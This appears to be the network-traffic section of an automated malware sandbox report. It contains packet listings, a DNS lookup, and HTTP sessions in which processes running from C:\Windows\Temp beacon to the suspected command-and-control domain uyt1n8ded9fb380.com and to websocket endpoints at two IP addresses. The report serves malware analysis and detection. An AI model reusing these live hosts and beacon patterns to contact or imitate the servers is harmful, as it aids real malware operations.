                                                                                  Nov 8, 2024 10:43:05.831564903 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:05.831576109 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:05.831943989 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.073210001 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.073371887 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.073379993 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.073641062 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.073652983 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.073878050 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.073884964 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.073896885 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.074161053 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.074635029 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.074827909 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.074840069 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.075207949 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.075509071 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.075742006 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.075784922 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.075792074 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.075994968 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.076379061 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.076534986 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.077112913 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.077112913 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.077121973 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.077331066 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.077421904 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.077545881 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.077552080 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.077790022 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.077790022 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.318072081 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.318293095 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.318422079 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.319060087 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.319098949 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.319111109 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.319343090 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.319590092 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.319696903 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.319761038 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.319770098 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.320115089 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.320374012 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.320584059 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.320596933 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.320877075 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.320877075 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.320889950 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.321311951 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.321522951 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.321526051 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.321532965 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.321702957 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.321882010 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.322191000 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.322314024 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.322401047 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.322557926 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.322562933 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.322748899 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.323084116 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.323129892 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.323302031 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.323313951 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.323474884 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.367322922 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.563769102 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.564024925 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.564117908 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.564126968 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.564229965 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.564307928 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.564488888 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.564498901 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.564891100 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.565208912 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.565776110 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.565785885 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.565978050 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.566159010 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.566159010 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.566163063 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.566751957 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.566757917 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.567008018 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.567040920 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.567111015 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.567842960 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.568054914 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.568239927 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.568247080 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.568650007 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.569186926 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.569186926 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.569559097 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.569561958 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.569791079 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.570425987 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.570436954 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.570621967 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.571317911 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.571321964 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.571701050 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.617232084 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.809286118 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.809294939 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.809370041 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.809415102 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.809489012 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.809676886 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.809676886 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.809708118 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.810046911 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.810170889 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.810179949 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.810323000 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.810336113 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.810401917 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.810595989 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.810626984 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.810863972 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.811877966 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.811908007 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.812303066 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.812303066 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.812335014 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.812688112 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.813710928 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.813740015 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.813894987 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.814145088 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.814146042 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.814176083 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.814487934 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.815633059 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.815661907 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.815893888 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.815922976 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.816113949 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.816113949 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.816224098 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:06.816399097 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:06.816519022 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:07.054290056 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:07.054310083 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:07.054402113 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:07.054459095 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:07.054678917 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:07.054733038 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:07.054864883 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:07.055143118 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:07.056364059 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:07.056432962 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:07.056756973 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:07.056809902 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:07.057137012 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:07.264060974 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:07.304672003 CET49744443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:43:07.515959024 CET44349744104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:43:07.516223907 CET49744443192.168.11.20104.21.86.219

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Nov 8, 2024 10:40:49.788155079 CET5562453192.168.11.201.1.1.1
                                                                                  Nov 8, 2024 10:40:49.944927931 CET53556241.1.1.1192.168.11.20

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Nov 8, 2024 10:40:49.788155079 CET192.168.11.201.1.1.10x62bbStandard query (0)uyt1n8ded9fb380.comA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Nov 8, 2024 10:40:49.944927931 CET1.1.1.1192.168.11.200x62bbNo error (0)uyt1n8ded9fb380.com104.21.86.219A (IP address)IN (0x0001)false
                                                                                  Nov 8, 2024 10:40:49.944927931 CET1.1.1.1192.168.11.200x62bbNo error (0)uyt1n8ded9fb380.com172.67.137.62A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • uyt1n8ded9fb380.com
                                                                                  • 23.88.71.29:8000
                                                                                  • 206.206.126.252:8008

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.11.2049737104.21.86.219809104C:\Windows\Temp\svczHost.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 8, 2024 10:41:34.362911940 CET78OUTGET /api/check HTTP/1.1
                                                                                  Host: uyt1n8ded9fb380.com
                                                                                  Connection: Keep-Alive
                                                                                  Nov 8, 2024 10:41:35.020631075 CET1289INHTTP/1.1 200 OK
                                                                                  Date: Fri, 08 Nov 2024 09:41:34 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-store,no-cache
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pCAk9xMrdJpXlgwPvWb7EHulsf0QWqc8O4p78VC0TL0iic%2F2s3Df9PZvhsGBFgLLV6Pz3IrTL0qD59Fw7pzNf1g9dHbpFFfFcOSY2KT%2BjJcYR%2Bl3AOhSS1MlGWBEoKuz56UgIMMQlqN3"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=22134&sent=56&recv=65&lost=0&retrans=0&sent_bytes=20304&recv_bytes=42940&delivery_rate=7053140&cwnd=255&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  X-Powered-By: ARR/3.0
                                                                                  vary: accept-encoding
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8df49baa19341760-EWR
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=102370&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=78&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 31 36 33 0d 0a 31 37 33 31 30 35 38 38 39 34 7c 6f 49 75 67 79 53 68 2f 6d 78 79 76 62 36 46 70 7a 4d 65 5a 4f 77 31 46 63 4f 68 4b 54 55 42 35 7a 52 64 77 31 6e 56 5a 72 6d 4a 4c 68 6f 38 51 2f 53 62 45 5a 2b 66 63 75 2f 4d 42 69 4a 43 42 36 4a 51 61 6b 52 33 30 59 32 68 6b 69 57 6d 64 59 71 38 45 53 75 6e 35 34 4b 67 6c 46 4b 54 65 46 68 75 47 31 59 47 64 55 2b 6d 31 5a 49 5a 72 6f 6e 41 58 33 6d 6a 63 69 6f 68 44 6b 39 62 61 34 53 6f 42 47 48 76 77 59 43 53 6b 6c 79 79 6b 67 43 70 6a 4e 75 49 65 68 35 46 6c 56 45 57 68 4a 57 38 69 66 36 67 33 39 55 4f 68 56 2b 65 5a 2b 50 64 6c 59 77 73 70 33 4d 67 34 4d 70 66 47 64 65 46 6c 42 4d 4a 4c 49 30 73 52 47 71 77 58 57 4e 64 69 32 77 4d 62 64 65 51 4d 62 43 46 4d 66 46 67 42 73 2b 45 4f 6c 41 78
                                                                                  Data Ascii: 1631731058894|oIugySh/mxyvb6FpzMeZOw1FcOhKTUB5zRdw1nVZrmJLho8Q/SbEZ+fcu/MBiJCB6JQakR30Y2hkiWmdYq8ESun54KglFKTeFhuG1YGdU+m1ZIZronAX3mjciohDk9ba4SoBGHvwYCSklyykgCpjNuIeh5FlVEWhJW8if6g39UOhV+eZ+PdlYwsp3Mg4MpfGdeFlBMJLI0sRGqwXWNdi2wMbdeQMbCFMfFgBs+EOlAx
                                                                                  Nov 8, 2024 10:41:35.020638943 CET111INData Raw: 46 64 64 38 6f 49 59 6d 49 64 6d 48 77 64 78 50 43 4d 44 62 75 66 57 69 6a 39 75 4f 59 4a 32 2f 38 6f 36 44 69 4c 2f 69 6a 35 62 75 34 6f 44 58 78 2b 6b 4c 49 4f 4f 59 74 54 30 33 78 33 6d 63 47 31 69 70 38 37 7a 4d 72 65 49 4a 74 35 6f 76 79 6f
                                                                                  Data Ascii: Fdd8oIYmIdmHwdxPCMDbufWij9uOYJ2/8o6DiL/ij5bu4oDXx+kLIOOYtT03x3mcG1ip87zMreIJt5ovyot2M1ptRv8IyQM44hl34axGXaw==
                                                                                  Nov 8, 2024 10:41:35.020644903 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.11.204974023.88.71.2980005032C:\Windows\Temp\myRdpService.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 8, 2024 10:42:39.234606981 CET164OUTGET /client/ws HTTP/1.1
                                                                                  Host: 23.88.71.29:8000
                                                                                  Connection: Upgrade
                                                                                  Upgrade: websocket
                                                                                  Sec-WebSocket-Key: gAaGKh0eCkeJbn3l2H15uw==
                                                                                  Sec-WebSocket-Version: 13
                                                                                  Nov 8, 2024 10:42:39.984611034 CET1289INHTTP/1.1 404 Not Found
                                                                                  Cache-Control: private
                                                                                  Upgrade: websocket
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Server: Microsoft-IIS/8.5
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1m6V87rGvKUDAfYXSYUoYe1XozAl6ij6cCk2RnUqOFZsnA1MQzLhWCh44uMkAHILpteNg9bNDpyCCh1yFne%2BNsMpkjGZuTUSamhMePcSIAjDS6BpNzv4OUBmXFZgWN7AA%2FqWqiG1W%2Bs8"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  CF-RAY: 8df49d3fccf49217-FRA
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=10522&sent=1878&recv=749&lost=0&retrans=0&sent_bytes=1670104&recv_bytes=89994&delivery_rate=1854136&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  X-Powered-By: ARR/3.0
                                                                                  Date: Fri, 08 Nov 2024 09:42:39 GMT
                                                                                  Content-Length: 4852
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{ma


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.11.2049741206.206.126.25280085032C:\Windows\Temp\myRdpService.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 8, 2024 10:42:42.328252077 CET168OUTGET /client/ws HTTP/1.1
                                                                                  Host: 206.206.126.252:8008
                                                                                  Connection: Upgrade
                                                                                  Upgrade: websocket
                                                                                  Sec-WebSocket-Key: 6nDA5lCQpEGthEIDWcZn5Q==
                                                                                  Sec-WebSocket-Version: 13
                                                                                  Nov 8, 2024 10:42:42.728471041 CET1289INHTTP/1.1 404 Not Found
                                                                                  Cache-Control: private
                                                                                  Upgrade: websocket
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Server: Microsoft-IIS/10.0
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yk89tA1Cs5X9Z%2FQDyumpqgbUA58aF25y2oPeDSsMnx7LaJlFYTmRVKB%2BsrjMJNHjeyTichBgeXkbLsuWlTETRMin0hvC0qishiJd0khUkK8LsBL%2BviiaQ0Id0nwsvwmGRae6eLpUcaS1"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  CF-RAY: 8df49d539b53cdf1-SIN
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8818&sent=245&recv=160&lost=0&retrans=0&sent_bytes=211706&recv_bytes=19468&delivery_rate=5608194&cwnd=253&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  X-Powered-By: ARR/3.0
                                                                                  Date: Fri, 08 Nov 2024 09:42:41 GMT
                                                                                  Content-Length: 4852
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{marg


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  3192.168.11.204974223.88.71.298000
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 8, 2024 10:42:54.934159994 CET164OUTGET /client/ws HTTP/1.1
                                                                                  Host: 23.88.71.29:8000
                                                                                  Connection: Upgrade
                                                                                  Upgrade: websocket
                                                                                  Sec-WebSocket-Key: MBF424LYDUiZvTO48zfN7Q==
                                                                                  Sec-WebSocket-Version: 13
                                                                                  Nov 8, 2024 10:42:55.634740114 CET1289INHTTP/1.1 404 Not Found
                                                                                  Cache-Control: private
                                                                                  Upgrade: websocket
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Server: Microsoft-IIS/8.5
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yK84hKtFy1R8OxCBne1t2y3o2OBMrF%2F%2BeYjqv8ddiO9nSqw9nXNUOeUaoKaMinSsrbosDHiacVZUEL5HxfiJgS%2BksnUdyhKKTSilfxi8f28xTSHmooqN8DTQq37ItuTXwQmV8gJ%2FjsBY"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  CF-RAY: 8df49da1ffc09e79-CDG
                                                                                  alt-svc: h3=":443"; ma=86400
